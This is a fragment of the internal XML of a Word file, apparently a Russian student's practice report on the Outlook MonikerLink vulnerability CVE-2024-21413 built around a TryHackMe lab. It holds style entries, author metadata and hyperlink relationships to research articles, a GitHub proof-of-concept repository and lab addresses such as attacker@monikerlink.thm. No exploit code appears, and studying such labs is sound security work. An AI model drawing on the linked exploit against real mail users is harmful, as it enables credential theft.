    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005436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&#1041;&#1088;&#1103;&#1085;&#1094;&#1077;&#1074;&#1072;%20&#1054;&#1083;&#1100;&#1075;&#1072;\Downloads\&#1054;&#1090;&#1095;&#1077;&#1090;%20&#1086;%20&#1087;&#1088;&#1072;&#1082;&#1090;&#1080;&#1082;&#1077;_2025_&#1055;&#1077;&#1090;&#1088;&#1086;&#1074;&#1055;&#1055;(5).docx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hyperlink" Target="https://medium.com/@sithuminzin969/understanding-the-microsoft-outlook-vulnerability-cve-2024-21413-moniker-link-53885e5f77bf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\&#1041;&#1088;&#1103;&#1085;&#1094;&#1077;&#1074;&#1072;%20&#1054;&#1083;&#1100;&#1075;&#1072;\Downloads\&#1054;&#1090;&#1095;&#1077;&#1090;%20&#1086;%20&#1087;&#1088;&#1072;&#1082;&#1090;&#1080;&#1082;&#1077;_2025_&#1055;&#1077;&#1090;&#1088;&#1086;&#1074;&#1055;&#1055;(5).docx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hyperlink" Target="https://github.com/CMNatic/CVE-2024-21413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mailto:attacker@monikerlink.thm" TargetMode="Externa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1041;&#1088;&#1103;&#1085;&#1094;&#1077;&#1074;&#1072;%20&#1054;&#1083;&#1100;&#1075;&#1072;\Downloads\&#1054;&#1090;&#1095;&#1077;&#1090;%20&#1086;%20&#1087;&#1088;&#1072;&#1082;&#1090;&#1080;&#1082;&#1077;_2025_&#1055;&#1077;&#1090;&#1088;&#1086;&#1074;&#1055;&#1055;(5).docx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research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture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eader" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\&#1041;&#1088;&#1103;&#1085;&#1094;&#1077;&#1074;&#1072;%20&#1054;&#1083;&#1100;&#1075;&#1072;\Downloads\&#1054;&#1090;&#1095;&#1077;&#1090;%20&#1086;%20&#1087;&#1088;&#1072;&#1082;&#1090;&#1080;&#1082;&#1077;_2025_&#1055;&#1077;&#1090;&#1088;&#1086;&#1074;&#1055;&#1055;(5).docx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:victim@monikerlink.thm" TargetMode="External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tryhackme.com/room/monikerlink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833EF-6592-470E-8CD6-48D17F309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17</Pages>
  <Words>1767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Александрова</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Илья Эков</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <cp:lastPrinted>2026-06-08T07:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-08T07:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-07T09:26:00Z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Office Word 2007</vt:lpwstr>
  </property>
</Properties>
</file>